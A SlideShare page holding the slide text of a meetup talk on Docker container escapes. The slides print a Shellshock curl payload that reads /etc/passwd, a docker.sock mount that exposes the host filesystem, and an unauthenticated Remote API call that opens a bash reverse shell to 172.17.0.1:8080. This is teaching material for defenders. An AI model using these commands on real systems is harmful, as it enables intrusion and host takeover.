Demystifying Container Escapes

Vaibhav Gupta
Vaibhav GuptaSecurity Researcher at Adobe
Vaibhav Gupta Twitter: @VaibhavGupta_1 Its all about Docker!
§ About Docker – 1 min Primer § Cgroups & Namespaces – Quick Demo § Docker Attack Surface 1. Exploiting Vulnerable Images 2. Docker --privilege flag 3. Privilege Esc. Using Docker.Sock 4. Abusing Docker Remote API
§ Docker is just way of running processes with limited privileges § DEMO § docker run -it ubuntu sh § ps aux | grep sleep
§ Cgroups § docker run -itd --pids-limit 5 alpine § sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10 § Namespaces (E.g. User Names) § vi /tmp/root-file.txt § docker run -itd -v /tmp:/shared alpine § Edit the file within container § Mitigation § sudo dockerd --userns-remap=default
DOCKER ATTACK SURFACE
• Vulnerable Images • Container running with unintended privileges • Docker Daemon Misconfigurations • Un-Auth Docker Client Remote API • Misconfigured or Vulnerable Hosts • Insecure Registry • Backdoored Images • ??
EXPLOITING VULNERABLE IMAGES § Sample Vulnerable App § docker run --rm -it -p 8080:80 vulnerables/cve-2014-6271 § Exploitation § curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://vulnerable-server:8080/cgi- bin/vulnerable
§ Some Container require /var/run/docker.sock to be mounted on containers § It is required if docker container requires to interact with host § For e.g. – ‘Dockerized’ Host Monitoring Application ü docker run -itd -v /var/run/docker.sock:/var/run/docker.sock alpine ü docker exec -it <id> sh ü apk update ü apk add -U docker ü docker -H unix:///var/run/docker.sock run -it -v /:/test:ro -t alpine sh
§ Allows to interact with remote Docker Daemon § No authentication required - By Default § Lets gain shell! ü sudo apt install jq ü sudo vi /lib/systemd/system/docker.service ü ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375 ü sudo systemctl daemon-reload ü sudo service docker restart ü curl http://localhost:2375/containers/json | jq ü docker -H tcp://localhost:2375 run --rm -v /:/mnt ubuntu chroot /mnt /bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1"
§ docker run -itd alpine § docker run --rm -it --cap-drop=NET_RAW alpine sh § ping 127.0.0.1 -c 2 § Printing Capabilities: capsh --print
§ https://docs.docker.com/engine/security/security/ § https://docs.docker.com/engine/security/userns-remap/ § https://securityboulevard.com/2019/02/abusing-docker-api-socket/
§ Email:Vaibhav.Gupta @ owasp.org § Twitter: @VaibhavGupta_1 § Blog: https://exploits.work
1 of 12

Demystifying Container Escapes

Download to read offline
Software

In this OWASP/Null Delhi session, I discussed the docker attack surface. Furthermore, I demonstrated how an attacker can escape the docker container and gain access to the host machine. Ref: https://null.co.in/events/655-delhi-combined-null-delhi-owasp-delhi-meetup

Vaibhav Gupta
Vaibhav GuptaSecurity Researcher at Adobe

Recommended

Docker orchestration by
Docker orchestrationDocker orchestration
Docker orchestrationOpen Source Consulting
3.9K views25 slides
Launching containers with fleet by
Launching containers with fleetLaunching containers with fleet
Launching containers with fleet충섭 김
1.7K views23 slides
Docker 101 - from 0 to Docker in 30 minutes by
Docker 101 - from 0 to Docker in 30 minutesDocker 101 - from 0 to Docker in 30 minutes
Docker 101 - from 0 to Docker in 30 minutesLuciano Fiandesio
861 views44 slides
CoreOS : 설치부터 컨테이너 배포까지 by
CoreOS : 설치부터 컨테이너 배포까지CoreOS : 설치부터 컨테이너 배포까지
CoreOS : 설치부터 컨테이너 배포까지충섭 김
17.3K views35 slides
Austin - Container Days - Docker 101 by
Austin - Container Days - Docker 101Austin - Container Days - Docker 101
Austin - Container Days - Docker 101Bill Maxwell
362 views40 slides
Provisioning & Deploying with Docker by
Provisioning & Deploying with DockerProvisioning & Deploying with Docker
Provisioning & Deploying with DockerErica Windisch
2.9K views29 slides

More Related Content

What's hot

CI and CD at Scale: Scaling Jenkins with Docker and Apache Mesos by
CI and CD at Scale: Scaling Jenkins with Docker and Apache MesosCI and CD at Scale: Scaling Jenkins with Docker and Apache Mesos
CI and CD at Scale: Scaling Jenkins with Docker and Apache MesosCarlos Sanchez
1.3K views58 slides
Infrastructure Deployment with Docker & Ansible by
Infrastructure Deployment with Docker & AnsibleInfrastructure Deployment with Docker & Ansible
Infrastructure Deployment with Docker & AnsibleRobert Reiz
24.9K views79 slides
dockerizing web application by
dockerizing web applicationdockerizing web application
dockerizing web applicationWalid Ashraf
204 views22 slides
Introduction to docker security by
Introduction to docker securityIntroduction to docker security
Introduction to docker securityWalid Ashraf
135 views19 slides
DCSF 19 Deploying Rootless buildkit on Kubernetes by
DCSF 19 Deploying Rootless buildkit on KubernetesDCSF 19 Deploying Rootless buildkit on Kubernetes
DCSF 19 Deploying Rootless buildkit on KubernetesDocker, Inc.
330 views26 slides
當專案漸趕,當遷移也不再那麼難 (Ship Your Projects with Docker EcoSystem) by
當專案漸趕,當遷移也不再那麼難 (Ship Your Projects with Docker EcoSystem)當專案漸趕,當遷移也不再那麼難 (Ship Your Projects with Docker EcoSystem)
當專案漸趕,當遷移也不再那麼難 (Ship Your Projects with Docker EcoSystem)Ruoshi Ling
3.6K views73 slides

What's hot(20)

CI and CD at Scale: Scaling Jenkins with Docker and Apache Mesos by Carlos Sanchez
CI and CD at Scale: Scaling Jenkins with Docker and Apache MesosCI and CD at Scale: Scaling Jenkins with Docker and Apache Mesos
CI and CD at Scale: Scaling Jenkins with Docker and Apache Mesos
Carlos Sanchez1.3K views
Infrastructure Deployment with Docker & Ansible by Robert Reiz
Infrastructure Deployment with Docker & AnsibleInfrastructure Deployment with Docker & Ansible
Infrastructure Deployment with Docker & Ansible
Robert Reiz24.9K views
dockerizing web application by Walid Ashraf
dockerizing web applicationdockerizing web application
dockerizing web application
Walid Ashraf204 views
Introduction to docker security by Walid Ashraf
Introduction to docker securityIntroduction to docker security
Introduction to docker security
Walid Ashraf135 views
DCSF 19 Deploying Rootless buildkit on Kubernetes by Docker, Inc.
DCSF 19 Deploying Rootless buildkit on KubernetesDCSF 19 Deploying Rootless buildkit on Kubernetes
DCSF 19 Deploying Rootless buildkit on Kubernetes
Docker, Inc.330 views
當專案漸趕,當遷移也不再那麼難 (Ship Your Projects with Docker EcoSystem) by Ruoshi Ling
當專案漸趕,當遷移也不再那麼難 (Ship Your Projects with Docker EcoSystem)當專案漸趕,當遷移也不再那麼難 (Ship Your Projects with Docker EcoSystem)
當專案漸趕,當遷移也不再那麼難 (Ship Your Projects with Docker EcoSystem)
Ruoshi Ling3.6K views
Docker 101, Alexander Ryabtsev by Tetiana Saputo
Docker 101, Alexander RyabtsevDocker 101, Alexander Ryabtsev
Docker 101, Alexander Ryabtsev
Tetiana Saputo1.2K views
Very Early Review - Rocket(CoreOS) by 충섭 김
Very Early Review - Rocket(CoreOS)Very Early Review - Rocket(CoreOS)
Very Early Review - Rocket(CoreOS)
충섭 김4.1K views
Building a Docker v1.12 Swarm cluster on ARM by Team Hypriot
Building a Docker v1.12 Swarm cluster on ARMBuilding a Docker v1.12 Swarm cluster on ARM
Building a Docker v1.12 Swarm cluster on ARM
Team Hypriot1.5K views
Orchestration? You Don't Need Orchestration. What You Want Is Choreography by... by Docker, Inc.
Orchestration? You Don't Need Orchestration. What You Want Is Choreography by...Orchestration? You Don't Need Orchestration. What You Want Is Choreography by...
Orchestration? You Don't Need Orchestration. What You Want Is Choreography by...
Docker, Inc.703 views
Docker 原理與實作 by kao kuo-tung
Docker 原理與實作Docker 原理與實作
Docker 原理與實作
kao kuo-tung4.9K views
CoreOS Overview by Victor S. Recio
CoreOS OverviewCoreOS Overview
CoreOS Overview
Victor S. Recio988 views
Docker orchestration using core os and ansible - Ansible IL 2015 by Leonid Mirsky
Docker orchestration using core os and ansible - Ansible IL 2015Docker orchestration using core os and ansible - Ansible IL 2015
Docker orchestration using core os and ansible - Ansible IL 2015
Leonid Mirsky10.3K views
How Puppet Enables the Use of Lightweight Virtualized Containers - PuppetConf... by Puppet
How Puppet Enables the Use of Lightweight Virtualized Containers - PuppetConf...How Puppet Enables the Use of Lightweight Virtualized Containers - PuppetConf...
How Puppet Enables the Use of Lightweight Virtualized Containers - PuppetConf...
Puppet6.3K views
Docker puppetcamp london 2013 by Tomas Doran
Docker puppetcamp london 2013Docker puppetcamp london 2013
Docker puppetcamp london 2013
Tomas Doran2.9K views
CoreOSによるDockerコンテナのクラスタリング by Yuji ODA
CoreOSによるDockerコンテナのクラスタリングCoreOSによるDockerコンテナのクラスタリング
CoreOSによるDockerコンテナのクラスタリング
Yuji ODA17.1K views
Docker in Action by Alper Kanat
Docker in ActionDocker in Action
Docker in Action
Alper Kanat44 views
Docker Mentorweek beginner workshop notes by Sreenivas Makam
Docker Mentorweek beginner workshop notesDocker Mentorweek beginner workshop notes
Docker Mentorweek beginner workshop notes
Sreenivas Makam1.1K views
Develop QNAP NAS App by Docker by Terry Chen
Develop QNAP NAS App by DockerDevelop QNAP NAS App by Docker
Develop QNAP NAS App by Docker
Terry Chen4.5K views
이미지 기반의 배포 패러다임 Immutable infrastructure by Daegwon Kim
이미지 기반의 배포 패러다임 Immutable infrastructure이미지 기반의 배포 패러다임 Immutable infrastructure
이미지 기반의 배포 패러다임 Immutable infrastructure
Daegwon Kim5.4K views

Similar to Demystifying Container Escapes

Docker security by
Docker securityDocker security
Docker securityJanos Suto
585 views57 slides
Introduction to Docker - Learning containerization XP conference 2016 by
Introduction to Docker - Learning containerization XP conference 2016Introduction to Docker - Learning containerization XP conference 2016
Introduction to Docker - Learning containerization XP conference 2016XP Conference India
430 views26 slides
JDO 2019: Tips and Tricks from Docker Captain - Łukasz Lach by
JDO 2019: Tips and Tricks from Docker Captain - Łukasz LachJDO 2019: Tips and Tricks from Docker Captain - Łukasz Lach
JDO 2019: Tips and Tricks from Docker Captain - Łukasz LachPROIDEA
74 views26 slides
[Devconf.cz][2017] Understanding OpenShift Security Context Constraints by
[Devconf.cz][2017] Understanding OpenShift Security Context Constraints[Devconf.cz][2017] Understanding OpenShift Security Context Constraints
[Devconf.cz][2017] Understanding OpenShift Security Context ConstraintsAlessandro Arrichiello
2.3K views37 slides
Docker container management by
Docker container managementDocker container management
Docker container managementKarol Kreft
328 views44 slides
Docker workshop by
Docker workshopDocker workshop
Docker workshopEvans Ye
2K views66 slides

Similar to Demystifying Container Escapes(20)

Docker security by Janos Suto
Docker securityDocker security
Docker security
Janos Suto585 views
Introduction to Docker - Learning containerization XP conference 2016 by XP Conference India
Introduction to Docker - Learning containerization XP conference 2016Introduction to Docker - Learning containerization XP conference 2016
Introduction to Docker - Learning containerization XP conference 2016
XP Conference India430 views
JDO 2019: Tips and Tricks from Docker Captain - Łukasz Lach by PROIDEA
JDO 2019: Tips and Tricks from Docker Captain - Łukasz LachJDO 2019: Tips and Tricks from Docker Captain - Łukasz Lach
JDO 2019: Tips and Tricks from Docker Captain - Łukasz Lach
PROIDEA74 views
[Devconf.cz][2017] Understanding OpenShift Security Context Constraints by Alessandro Arrichiello
[Devconf.cz][2017] Understanding OpenShift Security Context Constraints[Devconf.cz][2017] Understanding OpenShift Security Context Constraints
[Devconf.cz][2017] Understanding OpenShift Security Context Constraints
Alessandro Arrichiello2.3K views
Docker container management by Karol Kreft
Docker container managementDocker container management
Docker container management
Karol Kreft328 views
Docker workshop by Evans Ye
Docker workshopDocker workshop
Docker workshop
Evans Ye2K views
Docker 소개 by Kihoon Kim
Docker 소개Docker 소개
Docker 소개
Kihoon Kim1.1K views
Drone CI/CD 自動化測試及部署 by Bo-Yi Wu
Drone CI/CD 自動化測試及部署Drone CI/CD 自動化測試及部署
Drone CI/CD 自動化測試及部署
Bo-Yi Wu1.5K views
Docker Security workshop slides by Docker, Inc.
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
Docker, Inc.5.3K views
Running Docker in Development & Production (DevSum 2015) by Ben Hall
Running Docker in Development & Production (DevSum 2015)Running Docker in Development & Production (DevSum 2015)
Running Docker in Development & Production (DevSum 2015)
Ben Hall9.3K views
Real World Experience of Running Docker in Development and Production by Ben Hall
Real World Experience of Running Docker in Development and ProductionReal World Experience of Running Docker in Development and Production
Real World Experience of Running Docker in Development and Production
Ben Hall1.6K views
PDXPortland - Dockerize Django by Hannes Hapke
PDXPortland - Dockerize DjangoPDXPortland - Dockerize Django
PDXPortland - Dockerize Django
Hannes Hapke1.2K views
手把手帶你學Docker 03042017 by Paul Chao
手把手帶你學Docker 03042017手把手帶你學Docker 03042017
手把手帶你學Docker 03042017
Paul Chao642 views
moscmy2016: Extending Docker by Mohammad Fairus Khalid
moscmy2016: Extending Dockermoscmy2016: Extending Docker
moscmy2016: Extending Docker
Mohammad Fairus Khalid2.7K views
Docker, c'est bonheur ! by Alexandre Salomé
Docker, c'est bonheur !Docker, c'est bonheur !
Docker, c'est bonheur !
Alexandre Salomé2.3K views
Docker linuxday 2015 by Massimiliano Dessì
Docker linuxday 2015Docker linuxday 2015
Docker linuxday 2015
Massimiliano Dessì1.2K views
時代在變 Docker 要會:台北 Docker 一日入門篇 by Philip Zheng
時代在變 Docker 要會:台北 Docker 一日入門篇時代在變 Docker 要會:台北 Docker 一日入門篇
時代在變 Docker 要會:台北 Docker 一日入門篇
Philip Zheng1.1K views
Docker workshop 0507 Taichung by Paul Chao
Docker workshop 0507 Taichung Docker workshop 0507 Taichung
Docker workshop 0507 Taichung
Paul Chao788 views
手把手帶你學 Docker 入門篇 by Philip Zheng
手把手帶你學 Docker 入門篇手把手帶你學 Docker 入門篇
手把手帶你學 Docker 入門篇
Philip Zheng1.8K views
Things I've learned working with Docker Support by Sujay Pillai
Things I've learned working with Docker SupportThings I've learned working with Docker Support
Things I've learned working with Docker Support
Sujay Pillai1.2K views

Recently uploaded

DSD-INT 2023 Salt intrusion Modelling of the Lauwersmeer, towards a measureme... by
DSD-INT 2023 Salt intrusion Modelling of the Lauwersmeer, towards a measureme...DSD-INT 2023 Salt intrusion Modelling of the Lauwersmeer, towards a measureme...
DSD-INT 2023 Salt intrusion Modelling of the Lauwersmeer, towards a measureme...Deltares
5 views28 slides
Tridens DevOps by
Tridens DevOpsTridens DevOps
Tridens DevOpsTridens
9 views28 slides
360 graden fabriek by
360 graden fabriek360 graden fabriek
360 graden fabriekinfo33492
37 views25 slides
Advanced API Mocking Techniques by
Advanced API Mocking TechniquesAdvanced API Mocking Techniques
Advanced API Mocking TechniquesDimpy Adhikary
19 views11 slides
DSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - Geertsema by
DSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - GeertsemaDSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - Geertsema
DSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - GeertsemaDeltares
17 views13 slides
DSD-INT 2023 European Digital Twin Ocean and Delft3D FM - Dols by
DSD-INT 2023 European Digital Twin Ocean and Delft3D FM - DolsDSD-INT 2023 European Digital Twin Ocean and Delft3D FM - Dols
DSD-INT 2023 European Digital Twin Ocean and Delft3D FM - DolsDeltares
7 views23 slides

Recently uploaded(20)

DSD-INT 2023 Salt intrusion Modelling of the Lauwersmeer, towards a measureme... by Deltares
DSD-INT 2023 Salt intrusion Modelling of the Lauwersmeer, towards a measureme...DSD-INT 2023 Salt intrusion Modelling of the Lauwersmeer, towards a measureme...
DSD-INT 2023 Salt intrusion Modelling of the Lauwersmeer, towards a measureme...
Deltares5 views
Tridens DevOps by Tridens
Tridens DevOpsTridens DevOps
Tridens DevOps
Tridens9 views
360 graden fabriek by info33492
360 graden fabriek360 graden fabriek
360 graden fabriek
info3349237 views
Advanced API Mocking Techniques by Dimpy Adhikary
Advanced API Mocking TechniquesAdvanced API Mocking Techniques
Advanced API Mocking Techniques
Dimpy Adhikary19 views
DSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - Geertsema by Deltares
DSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - GeertsemaDSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - Geertsema
DSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - Geertsema
Deltares17 views
DSD-INT 2023 European Digital Twin Ocean and Delft3D FM - Dols by Deltares
DSD-INT 2023 European Digital Twin Ocean and Delft3D FM - DolsDSD-INT 2023 European Digital Twin Ocean and Delft3D FM - Dols
DSD-INT 2023 European Digital Twin Ocean and Delft3D FM - Dols
Deltares7 views
Keep by Geniusee
KeepKeep
Keep
Geniusee75 views
Dev-Cloud Conference 2023 - Continuous Deployment Showdown: Traditionelles CI... by Marc Müller
Dev-Cloud Conference 2023 - Continuous Deployment Showdown: Traditionelles CI...Dev-Cloud Conference 2023 - Continuous Deployment Showdown: Traditionelles CI...
Dev-Cloud Conference 2023 - Continuous Deployment Showdown: Traditionelles CI...
Marc Müller37 views
Gen Apps on Google Cloud PaLM2 and Codey APIs in Action by Márton Kodok
Gen Apps on Google Cloud PaLM2 and Codey APIs in ActionGen Apps on Google Cloud PaLM2 and Codey APIs in Action
Gen Apps on Google Cloud PaLM2 and Codey APIs in Action
Márton Kodok5 views
ict act 1.pptx by sanjaniarun08
ict act 1.pptxict act 1.pptx
ict act 1.pptx
sanjaniarun0813 views
Headless JS UG Presentation.pptx by Jack Spektor
Headless JS UG Presentation.pptxHeadless JS UG Presentation.pptx
Headless JS UG Presentation.pptx
Jack Spektor7 views
Agile 101 by John Valentino
Agile 101Agile 101
Agile 101
John Valentino7 views
Generic or specific? Making sensible software design decisions by Bert Jan Schrijver
Generic or specific? Making sensible software design decisionsGeneric or specific? Making sensible software design decisions
Generic or specific? Making sensible software design decisions
Bert Jan Schrijver6 views
Software evolution understanding: Automatic extraction of software identifier... by Ra'Fat Al-Msie'deen
Software evolution understanding: Automatic extraction of software identifier...Software evolution understanding: Automatic extraction of software identifier...
Software evolution understanding: Automatic extraction of software identifier...
Ra'Fat Al-Msie'deen7 views
SAP FOR TYRE INDUSTRY.pdf by Virendra Rai, PMP
SAP FOR TYRE INDUSTRY.pdfSAP FOR TYRE INDUSTRY.pdf
SAP FOR TYRE INDUSTRY.pdf
Virendra Rai, PMP24 views
DSD-INT 2023 Wave-Current Interaction at Montrose Tidal Inlet System and Its ... by Deltares
DSD-INT 2023 Wave-Current Interaction at Montrose Tidal Inlet System and Its ...DSD-INT 2023 Wave-Current Interaction at Montrose Tidal Inlet System and Its ...
DSD-INT 2023 Wave-Current Interaction at Montrose Tidal Inlet System and Its ...
Deltares10 views
BushraDBR: An Automatic Approach to Retrieving Duplicate Bug Reports by Ra'Fat Al-Msie'deen
BushraDBR: An Automatic Approach to Retrieving Duplicate Bug ReportsBushraDBR: An Automatic Approach to Retrieving Duplicate Bug Reports
BushraDBR: An Automatic Approach to Retrieving Duplicate Bug Reports
Ra'Fat Al-Msie'deen5 views
DSD-INT 2023 Machine learning in hydraulic engineering - Exploring unseen fut... by Deltares
DSD-INT 2023 Machine learning in hydraulic engineering - Exploring unseen fut...DSD-INT 2023 Machine learning in hydraulic engineering - Exploring unseen fut...
DSD-INT 2023 Machine learning in hydraulic engineering - Exploring unseen fut...
Deltares7 views
2023-November-Schneider Electric-Meetup-BCN Admin Group.pptx by animuscrm
2023-November-Schneider Electric-Meetup-BCN Admin Group.pptx2023-November-Schneider Electric-Meetup-BCN Admin Group.pptx
2023-November-Schneider Electric-Meetup-BCN Admin Group.pptx
animuscrm14 views
AI and Ml presentation .pptx by FayazAli87
AI and Ml presentation .pptxAI and Ml presentation .pptx
AI and Ml presentation .pptx
FayazAli8711 views

Demystifying Container Escapes

  • 2. § About Docker – 1 min Primer § Cgroups & Namespaces – Quick Demo § Docker Attack Surface 1. Exploiting Vulnerable Images 2. Docker --privilege flag 3. Privilege Esc. Using Docker.Sock 4. Abusing Docker Remote API
  • 3. § Docker is just way of running processes with limited privileges § DEMO § docker run -it ubuntu sh § ps aux | grep sleep
  • 4. § Cgroups § docker run -itd --pids-limit 5 alpine § sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10 § Namespaces (E.g. User Names) § vi /tmp/root-file.txt § docker run -itd -v /tmp:/shared alpine § Edit the file within container § Mitigation § sudo dockerd --userns-remap=default
  • 6. • Vulnerable Images • Container running with unintended privileges • Docker Daemon Misconfigurations • Un-Auth Docker Client Remote API • Misconfigured or Vulnerable Hosts • Insecure Registry • Backdoored Images • ??
  • 7. EXPLOITING VULNERABLE IMAGES § Sample Vulnerable App § docker run --rm -it -p 8080:80 vulnerables/cve-2014-6271 § Exploitation § curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://vulnerable-server:8080/cgi- bin/vulnerable
  • 8. § Some Container require /var/run/docker.sock to be mounted on containers § It is required if docker container requires to interact with host § For e.g. – ‘Dockerized’ Host Monitoring Application ü docker run -itd -v /var/run/docker.sock:/var/run/docker.sock alpine ü docker exec -it <id> sh ü apk update ü apk add -U docker ü docker -H unix:///var/run/docker.sock run -it -v /:/test:ro -t alpine sh
  • 9. § Allows to interact with remote Docker Daemon § No authentication required - By Default § Lets gain shell! ü sudo apt install jq ü sudo vi /lib/systemd/system/docker.service ü ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375 ü sudo systemctl daemon-reload ü sudo service docker restart ü curl http://localhost:2375/containers/json | jq ü docker -H tcp://localhost:2375 run --rm -v /:/mnt ubuntu chroot /mnt /bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1"
  • 10. § docker run -itd alpine § docker run --rm -it --cap-drop=NET_RAW alpine sh § ping 127.0.0.1 -c 2 § Printing Capabilities: capsh --print
  • 12. § Email:Vaibhav.Gupta @ owasp.org § Twitter: @VaibhavGupta_1 § Blog: https://exploits.work